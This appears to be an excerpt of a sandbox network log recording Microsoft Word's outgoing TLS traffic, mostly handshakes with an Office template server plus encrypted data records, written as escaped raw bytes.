  318. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe2\\xe7\\xdf\\xca2'\\xd3\\x98\\x85j\\xaa\\xb7\\x18\\x9c\\xd3\\xf2\\x99\\x8b0\\xfa\\xc5\\xb0i\\x85\\xec\\x97\\x0b\\xbd\t\\xb7!\\xe1\\x08b\\xae\\xec/\\xb7\\xca\\xc5\\xd2|b\\x1bq\\xcf\\xd0\\xc0\\xe5!\\x19\\xa1\\x93 \\x9e\\xaa\\xf9\\x820#\\xa2\\xce\\x05\\xed\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x03\\xc9@\\xa0\\xf7-y\\xc7\\x07\\x94w$3\\x96\\xe4\\xda\\x99\\xa3\\xf4%pz;~b\\xe6\\xb4\\xf2\\xb6\\x81x\\xea\\xf3)\\x9ct\\xf8\\x04)+\\x8f\\x86\\xd5\\xbf3he\\xf1"
  319.  
  320.  
  321. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04e\\xde\\xff\\xf0\\x9f\\xb3\\xf9?r\\x14\\xb2.\\\\xd8\\xcf\\xfa\\x01\\x99\\x0c\\x12\\x18p_\\xd9\\x8a\\x17\\x81\\xb2\\xce\\xe5\\x83d\\x87\\x9c\\xa0\\xe5jn4\\x7f\\xd7\\xfb\\x95g\\x10\\xafe\\x8c*\\xc6\\x8b\\xdc/2;m\\x03\\x0b\\x12\\x80\\xbb\\xcap\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000-\\x14\\xfac\\xc1?\\x11\\x1a\\xde\\x05l\\xf0<\\x9a*k(\\\\xa9\r\\xb1\\xfc\\xa8\\x01\\xb6o\t\\xc8\n\\x92(\\xab\\xf5\\xdd\\x04\\xc3y=t\\x7f\\x1b\\xf2z\\xc1\\xee\\x1f\\xea\\xee"
  322.  
  323.  
  324. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x1bpt&>\\x18\\x83\\x19\\x12o\\xfcy\\x07\n\\xc9\\xe3\\xb8%\\xe2\\x9a\\xf5$^\\xa8\\xacco1\\xff\\xad\\xe18\\xd9\\xde\\x8c\\xd5j\\x82\\x00\\xf9\\xb1\\x8d\\x0e;\\xf1!\\xd2tj\\xe7|b\\x92x\\xae\\x89\\xd8\\xe3uo\\x85\\x98pz\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x11\\x94\\x11\\x1c\\xbb\\x88\\xca,\\x1e\\xe8&\\xb6\\x8d\\x8d\\xee^s\\xe8g$\\x82\r\\xcat\\xd4u\\xad3ni\\xa5g=\\x00\"\\x96m\\x13g\\xf3\\x9dx\\xd10\\xd7\\xc2\\xb2\\xdd"
  325.  
  326.  
  327. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92 \\xcf\\x93\\x0c\\x80\\xd2\\xd0\\xea+(^u\\\\xc0\\xaa\\xa3s\\xc0\\xad\\xac\\x01%g\\xb51r\\xef*\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  328.  
  329.  
  330. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92j%\\x1d\\xcf1\\x1fh\\xfa$\\x93\\xb4\\xfb9\\xfa\\xaa3\\xbd\\x08\\xcfb\\x8a)\\xb9x\\x99\\x94\\x94\\xdb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  331.  
  332.  
  333. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92f\\x85,<\\x99m\\x1d\\x8b\\x1b\\xd9\\xc3\\xeae\\x15\\x0f\\x06\\x8b0\\xddv\\xc2\\\\xb9\\x91'\\xe8\\x9b\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  334.  
  335.  
  336. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x17\\xcb\\xd5o\\xf7\\x05\\xfc\\xd9\\xb74)\\x89zwk\\xcf\\x14$\\xd9s8e\\xf0\\xbem+o\\xf4\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  337.  
  338.  
  339. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xe4\\xc3\\xcd\\x1e|\\xfa\\xb2\\xd3\\xca\\x1a\\xe7\\xaeo_w\\x9b0\\xb3\\x8c\\xb3\n\\xbc\\x7fdp\\x8d\\xf8\\x8c\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  340.  
  341.  
  342. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xd5j\\xd2\\x12\\x00p\\x85\\x93w\\x0f\\xbd\\x93\\xc2\\xf2w\\xbbyl\\x0b\\xa1\\xeb7 (\\xfe\\x8f\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  343.  
  344.  
  345. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xab>\\x97\\xad:b\\xb0.\\x02#\\x87b\\xbe\\xc1\\xa6f\\xc6p\\x9b\\x89r\\xd3\\xd0v\\xc6\t\\xc9\\xc6\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  346.  
  347.  
  348. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x966\\x11\\xc4\\xdf\\xaf\\xa4l\nh\\xf1\\xe7\\x85\\x17\\xed\\xf7n\\xe8\\x80y\\x9d\\x0e\\xa7\\x81h\\xc2\\xe5\\x94\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  349.  
  350.  
  351. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x10y\\xa3\\xd0\\xc4\\x91\\x90q\\xeb\\x8c\\x8d\\xf3\\x8d f\"\\x0f\\x9epn\\x0e\\xf1\\xebf\\xac\\x89\\x0e\\xec\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  352.  
  353.  
  354. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xe9q\\x08c&-\\x08\\x8c#\\x02\\x05\\x7fv\\xcd\\xfd\\xc3\\x00\\x15\\xb5f!\\xa7!\\xe7\\x85\\x8e\\xb1\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  355.  
  356.  
  357. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x02\t\n\\x00\\x11\\xf8\\x06\\xeay\t6\\xee$f,\\xc8\\xb2\rk\\xcf\\xbf\\x96\\xa5\\x00\\xf3\\xfe\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  358.  
  359.  
  360. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xbfr\\xf0\\x8b\\x01\\xe0\\x1c8y\\xd8\\xd4\\xaev\\x8c\\x8d\\xf3\\xac\\xe3s\\xd3\\x98kq\\xb9u\\x02b\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  361.  
  362.  
  363. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x05al\\xc44s\\x1a\\xe3\\xa5\\xad\\xf1\nlyl\\xa5\\x9f%\\x83\\xdb\\xe3\\xf0\\xe7\\xc4w\\xcc)k\\xb6\\xb9lt\\x858\\xa2\\x96\\x15\\xc5@\\x9dr\"f\\xa5n\\xbe\\xed\\xed6\\x9afah\\xc6\\x90\\xfe\\xbc\"\\xb0#\\x85\\xf1eu\\xa0w\\xf8\\xcf\\xb1\\x8co\\xf4\\xe3\\x0b\\xef\\xf5\\xce\\x80\\xda\\x1eb\\x9c\\xfa\\xbd\\xb3\\xfd\\x9d\\xfc\\xac\\xa9\\xaa\\xa9t\\xea\\xb9\\x01\\x08\r\\x98\\x0b\\xbf\\x91\\xb8\\x8a\n\\x80\\xdb\\xf1\\x89\\xd4k\\x12\\xe1\\x96\\xd8\\x19j\\x17,\\x99\\xa1\\x8a\\xbe\nu\\x10\\x16\\xf5\\xaae\\xe4_\\xe7j\\x1d\\x7f\\xfef%t\\x8e\\x99\\x16.\\xd3\\xad\\xb7\\x97\\x1bd6b\\xa3\\xfai\\xa7\\xef\\xf5\\x04p(h\\xac\\xdfm\\xf0(^\\x98&\\xdc\\xf4ips\\x0c$\\x1f\\xecl9n\\xcd.n\\xb9\\xb3\\x1f\\x196\\xfd\\x8e\\xd1w*\\x9d\\xa7c\\xda\\x04\\xb0\\xec\\x9a\\x04w\\x88y\\x9epo\\x88\\xc5\\xe5*\\x97\\x0b=\\x93\\xfa'\\x0c\\x97o\\xa4c6t\\x00\\x1a\r\\x96\\x0c\\x95\\x01\\x93\\x81p\\x06\\xd56\\xf5\\xcf\"\\x12"
  364.  
  365.  
  366. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xa6/\\xb3u\\xb8\\x86\\x17\\x82$a+\\xe3\\x1ehz3\\x9f\\xd4\\x0f\\xe6\t3\\x11\\xe4\\x8b\\xd5\\xc7\\xc9\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  367.  
  368.  
  369. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xccs\\xfd\\x859\\xa5\\xfd\\x07\\xcc\\xc2\\xe6i\\x19\\xde\\xedk\\xdc\\xd3\\xd4\\xf2'\\xc7\\xac\\x17\\xf6k\\xd9\\xfc\\xfer^\\xb5\\x0f\\xbd\\xc1,\\x87\\xfcm%i4m\\x1do\\xf6\\x9d\\xe8 \\x0b\\xc1\n\\xc5$\\xf6\\xdb\\xff|#+\\xf4\\xfc|3\\x1av\\xc8h\\xe8\\xee\\x18\\xd4\\xf2-j9\\x12.\\x9f9\\xd4\\xc4z\\x14\\x03\\xb1\\xcc!\\x84\\xd4c\\xb1\\xeb#\\xdbf\\x93\\xf7\\x07\\x00\\xbae\\xf3\\xc1\\xb6u:7\\xe4%\\xf0_\\xda\\xfd2\\x96\\xc0m\\xd0\\xe2\\xd6\\x91\\xe4\\xd9\\x99\\xf8\\x11g\\xe0\t@\\xbaj4\\xc5\\xefz\\x9d\\xbe\\xae\\xd5i97\\x17\\x11z\\x815!d\\xc5\\x87\\xe5\\xa7rg\\xed\\x17\\xec\n=?\\xdf\\x1c\\x1bb\\x95\\x97q\\x8a\\xe2\\xc4vd\\xa0pt\\x1fgx\\xachb\\xa4s`\\x9d\\xc6\\x1b\\xb2\\xf9\\x04t;`\\xc5\\xb07\\xf0\\x08w\\xd5w6\\xfd\\xef\\x0cy\\x90$\\x8a\\xc2c\\xb7\\xaeqd\\xaeg\\x90\\xb1\\xc1\\x86\\xd9\\x0c\\xb1\\xa0&\\x1f8\\xfe\\x8fn \\xc7\\xa4ub\\xab\\xcec\\x8a-\\xf6\\x82"
  370.  
  371.  
  372. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xee\\xf3\\xf7,\\xc8\\xb1$\\xe5\\xc6\\xefj\\xf5\\xb8\\x95\\xa0\\=.\\xfe\\x9e\\x85z\\xa7\\x845\\x9d\\xf6\\x88tw\\xa1n\\\\xde&.\\x7fh?\r\\xf5\\xd2\\xc2\\x90\\x12u\\xd6\\x0c\\xc3\\x81\\x0b\\xba\\x81\\xea\\x7fx$\\x82\\xeajp\\x04\\x05\\xc9\\xc6u\\xb7\\xe1yr\\xb3\\x9d0c\\xa1\\xd2\\xe0\\xde\\x87b\\xa8r\\xa6\\x98q\\x88\\x1e\\x06\\xc9\\xbbc\\xb4k\\xbfv\\x8c\\xec\\xc1\\xfd\\x82\\xcaw\\x86\\xf4\\xd5\\x0c\\x87w\\x92\\x8a\\x86\\xbb\\xd8i\\xad\\xba\t\\xa9\\x1ek\\x19=\\x039=w\\xa9\\x18\\x0f\\x88\\xd9vh\\xc3\\xcd\\xf3\\xf9f\\xf2u\\x9d\\x198d9\\x7f\\x17\\x8c\\xd6\\xca\\xdc\\xa5+\\xd7\\xa4\\x12:e\\x8d\\xf3\\xa5\\x122k\\xa9\\x89\n\\xf5\\xbd\\x08\\xcc\r.k\\x7f\\x12u\\x7f\\xacu\\xbe\\xb9\\x02ek\\x92\\xe5\\xf0\\xd4b\\xb8\\xb0y\\xa0`3\\xadf3\\x97\\xef'\\xd6p\\xfd\\xc6r\\xfa\\xfe\\x93@\\xad\\xd2r\\x0c\\xd1\\x9f\t\\x91oo=\\xea\\xc5\\xaa\\x99vp\\xe1\\xf3\\xb3\\x1cvw/\\x91\\xfcnx\\xb6\\xc5#\\x06#\\x84v\\x11"
  373.  
  374.  
  375. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb1\\x89\\x85\\xc6\\x9a\\xad\\xbcle\\x03%\\xc0j\\xd5n\\xad\\xa0\\x15\\xb7\\x83x\\x971\\xf8\\x9c\\xef\\xac\\x05\\xf8\\x979\\xe1\\x80m\\xcfw\\x1a\\x94_\\xfe!a\\xb1j\\xc8a2\\x9f\\xe7ld\\x05\\x80\\xaf!/\\xe8\\xd2^\\xf4\\xbb\\x8d\\x01\\xf9m q\\x0bg\\xcf\\xa4\\xa5*\\xc0wb\\x00x\\xb5\\xc5\\xf0\\xeb/\\xf6\\xd4\\x00-qcb\n\\x92l\\\\xec\\xf1\\x9a\\xcavz\\xf8\\xeb.k&\\x9e\\xf6\\xca\\x17\\xcc\\x8c\\xb5:-\\xbf\\xe3\\x17\\x88\\x19\\xcb7\\xfal\\x95~\\x1bp\\x0e\\x86\\xa7\\xd3\\xe0\\xd5bv\\x81\\xc2\\xa2\\x01*\\x7f\\xfb\\xdb\\xc4\\xa9\\x80\\xecs8\rl\\xca\r\\x95\\xe3\\xe8?\\xaf\\xe3\\xbc\\x95\\x06\\xc8i\\xf5\\x04\\xe3<s\\xf7\\x97\\x10f\\x95\\xef\\xa4\\xbf\\xd6\\xe5?*\\x00af\\x8b\\xbb\\xeb%\\x0e%\\xbb\\xb5e\\x9e^\\x8cw\\x07\\xfe\\xcck\\xfca2\\xb43\\x88\\xfc\\xdc\\xa8h\\x1a\\x05rb\\x80\\x1bk\\xf4\\xffl\\x1e\\x8b\\xf0\\xb9\\xb9\\xd2\\xdbr\r\\x9a\\xe2k\\xdd=7\\x91\\xe7\\x1b\\x9f\\xb3\\xd6\\xf4k\\x19\\xc0\\xf1\\xb1\\xfb"
  376.  
  377.  
  378. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010t\\xa7\\x96\r\\xcf|o\\xc9b<\\xdd\\xdf\\xba\\xe7\\xbem>d\\xcc\\x13\\x9f\\xa1\\xe2\\x8fp\\xd2c58\\xd0\\x886j5 \\xc1w\\xb1'i\\xd6\\x06\\xa8\\xe5da\t\\xa1\\x85mx5\\xfb\\x1a\\xeax\\xbbe\\xf7\\x8c\\xd4\\xaa\\x14\\x8e=\\xefn\\xe0\\xb8\\xc3\\x9c\\xc1\\x86\\x02\\x9e\\xa5\\xab\\xff\\x1d\\x15\\x00\\xd0\\xd0\\xb19x\\x19\\xe7\\x95\\xcd\\x85\\x82\\x87\\xc0\\x0cx\\xdft\r\\xf5b\\xf8\\xd6r\\xee\\xber\\x83f\\xae\\xd0\\xcd\\xe7c\\x7f\\x0e\\xf2\\xe6tj\\x8az0\\xd3\\xd0g\\xd2\\x83*\\xda\\xd7\\xdd\\xc8@i\\xeb\\x06\\x0e'\\x91\\x03\\xce vg\\xa16\\x8e\\x17\\xce&iq\\xc2\\xde\\xeaz\\xbfd<&\\xe0\\x9d\\xb2:^\\x84\\x16r\\x07\\xbe\\x9b\\xe9\\xa6\\xd5\\x8c\\xba\\xe8\\x9a\\xff\\x97\\xa1o-\\xa2\\xe7\\xf5\\xe0\\xe9\\x8a\\xedy\\x89\\xf1q6\\x00\\x0b#fc\\xf2\\xa6+*%\\xc4\\x93\\xb15\\x11\\xc0>\\xc21\\xa6z\\\\xd1\\x16\\x8c+'\\xfcnq\\x8d\"\\xe1\\x98\\x12\\x83c\\xdd\\xad\\x832\\xf2n\\xa4e\\xcc\\x9b\\xfd\\xaa\\x9f\\xdf"
  379.  
  380.  
  381. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010*\\xa1\\xdb\\x97\\x91\\xc3(c\\x9f\\xd8\\xe1iyr5\\x18\\xbdi\\xe1\\x86\\x00\\x9f\\xad\\xab\\xea\\x15\\x9d\\x85lc\\x8d\\x1e\\x81\\xa1\\xac;\\x98\\xf1`\\x1e\\x1fz\\xf3\\x15\\x7f?\\xeb#\\xfb\\x0b\\x9f\\xc0\\xefv\\xd3\\xd93\\xe2\\xa5d\\x89\\x82\\xd7w\\xc6<,-e\\x86\\xba\\xc0&\\xa4ih\\xbe\\xdb\\x0f\\xdc\\xf7\\xdb \\x06\\x1c\"h\\x82+\\xac\\xbe\\xe7\\x91\\xcax\\xfe\\xb4\\x8ag\\xa9\\xcf\\x9fl.\\xa6\\xe5\\xc3\\xdab\\x142\r\\xd4\\xd2\\xa1$,\\x9e\\xe8\\xa5b\\x1c\\x0e\\x80g\\xd4\\xe7%\\xee\\xa75l4f\\x81\\xe1\\x87\\xee6v\\xe0\\xd6\\xfe\\x06\\x07\\xde,\\xf6\\xfa\\xebv(\\xbc>db\\x19\\xf2e\\xa4\\x89x\\xfe\\xc30\\x02l\\xbb\\xfb\\xcar\\xe0\\xa0\\xcbg\\xff\\x02etz n\\xc2\\x85\\xc4\t\\x0e\\xa8\\xce\\xa5z\\x943\\x97\\xf4\\xa6?z\\x01\\x9d\\x0b\\xa1\\x9c_\\xaf\\xb1\\x19_\\x14w\\x05\\xd4\\x9e)\\x86\\xae\\xc4\\x8c\\xec\"\\xb8\\x9d\\xafo\\xf5\\xf8\\xb9\"d\\x07,p\\xe6\\x9d\\x10\\xaez\\x8a\\xdc\\xbc\\xfe\\x16\\x11\\xab\\xe6\\xfa"
  382.  
  383.  
  384. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04sr\\x94\\xee7\\xc2\\x0f\\xc5h\\x86\\xb2\\x95!\\xe8\\x9f$\\x99\\xca\\x99\\xeb\\x08\\x91*\\xc1\\xf9\\xf1\\xebu=t\\x9a\\x19\\xec\\x92t\\xee\\x88\\xbc\\x97i\\xf3$\\xd2/\\xc1\\xc6yy\\xdf\\xd5uj\\x02rl\n\\xe6\\x85\\xd5\\xa6\\xa9\\xc7\\x8d\\xed\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000s\tm\\xd60\\x06\\x93\\x0e\\xc6\\x0f\\x91\\x84\\x86\\xce\\xbc\\xa5\\xe9\\xbd\\xcb\\xc1!\\xaa\\xf7\\xca\\xf7\\xb8\\xc0o\\xe1o\\x98w(w\\xb5\\x0e\\xa7\\xb4=x\\x99\\xc1\\xf1m\\xa1\\xb0\\+"
  385.  
  386.  
  387. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xca\\x98\\x13\\x03\\xd3c\\xe0\\x8d\\x1c\\\\x86\\x0f\\x8a\\xa7\\x02\\x82\\xba\\xef4qa\\xbb\\xcf\\x1c\\xec\\x9cu\\xbeq\\\\xfe\\xc8\\x12 \\x9b\\xd7\\xb8e7\\xcc\\x8c.\\x0c|te\\xc9\\x05\\xc9\\x94'v\\xea\\xef.\\x88\\xd7\\x8d\\x9alx\\xf7\\xd7\\xdd\\xc8\\xa8\\xa9\\xf0i\\x8c\\x11\\x0c\\xc66i\\x1d\\xad\\x7f\n\\xca\\x92\\x93\\xe2\\xafi\\xaf\\x1d.o\\xa92\\x8e\\x1b'e\\x987\\x18\\xdc\\xc4\\x95\\xa0\\xa3c\\xc5\\xa0\\x1f\\xb9i\\xde\\xd5br\\xc3\\x8d\\x02\\x9f\\xa2\\xeady\\x13\\xff\\x1f\\x91\\x92\\x0f(\\x12\\x82w2\\xaa\\x94\\xbep\\xb0r\\xe6\\x03\\x8ah9\\x1e\\x87\\x03p\\x9cik\\x164\\x82.\\x90&\\xdc\r\\xe0\\xe4\\xcbja\\x9a\\xd1\\xb6&5\\x1e\\xff\\xd3\\xc0gf%x\\xba\\x9f\\xc3\\xb4bh~c\\x83\\x0e;\\x00\\xa9q\\xaa9\\x91\\x9a\\x9b\\x9c\\xd9\\xa5a\\xa3s\\x12\\xd3$\\*\\xff\\xaa\\xcd1k\\xf2r\\x96\\x1d2\\x8e\\xff\\xaas\\x966\\xb8\\xcd\\xd6%\\xe4\\xce@\\xc4\\x9e\\x02\\xe2\\x92\\x84\\x95e!cz\\x82f\\x00\\xd5\\x9cx"
  388.  
  389.  
  390. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x1fx7\\xa7\\xb9\\x1dx\n;\\xf6\\x14h\\xfen\\xe5\\x941w\\xa78\\x0b\\xc2\\x86k\\x023i!\\xcda\\x85\\\\x96\\x8c|2\\x1a\\xf8\\xc7\\xad-r\\xdc\\xd9\\xc52\\x179\\xe2\\xe9\\x105z\\x8b\\xce\\x8e\\x1c\\xb1\\xc5w\\xcc\\xa83\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc7y\\xf7\\xee\\x05_wv\\xdad0cq\\xf25\\xab02\\xa8\\x1e\\x8c\\x1a\\xec\\xa0\\xa1mp'n\\xfd\\xa3\\x10(d\\x1cv\\x04\\x88\\xda\\x18\\x9b\\xf8\\xdf\\xc9z\\xe3\\xe8\\x11"
  391.  
  392.  
  393. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x97\\x87\\xbc#ak\\xf7\\\\xeb\\x97\\x16~\\\\xb9\\xfc:`\\xb1\\xaa\\x9c\\xc0\\xcf%\\x01\\x8eva\\x0c\\xd9q\\xb5\\x91\\xb6\\x04l\\x15b$\\x04c\\xdc\\x1b\\xef\\xacc\\xfdmj\\x062c\\xfa\\xe9\\xd6m\\xad\\xf1\\xe1\\x06l\\x01\\x98\\xc8\\xd7h4w\\x12o\\xbc\\xd3o\\xa5uwp\\x8f\\xcb\\xf4\\xf8\\xfdy\\x11v\\xd3\\xec\\xf2\\x9d\r\\x0b\\x0f\\x1a~\\x1a\\x04\\x88\\xd8\\xfa\\x05s-y\\xcd\\xf0k\\xe1\\x04'\n\\xaf\\x0f\\x86u.\\x96\\xb4al\\x90\\xde\\xcf-\\xbd\\x16\\xa6\\xb5\\xd4\\xb0\\xfc\\xfbzr\\x12)\\x8b$k\\xe5-m\\xe4l\\x8d\\xad\\xb7>3\\xf2\\xa2\\x8c\\x87.d\\xdc\\xfc\\x08\\xcf\\x98\\xd0.\\x97\\xb4\\xab\\x16\\xf9\\xe0\\x86\\xc7q\\x15\\x80m\\xe9\\x83\\xbfj\\x98\\x00n\\xd1\\xde\\x97\\x07\\xbd\\x1c\\x06\\xe9l\\xe7\\xd1\\xb6#\\xdbo+\\x07\\x95k\\xda\\xe1y9\\x80\\xc1\\xack\\xb0\\xb5>\\xb23\t\\xe9~\\xabg%\\xc4m\\xbey\\xd9\\xe9)\\xc7\\xe6\\x95\\x96\\xf9x\\xdc|\\x98\\xd0\\xeez\\x05.\\xf7b1\\xe3\\x9e\\x1cp\\xf6\\xce\\x83"
  394.  
  395.  
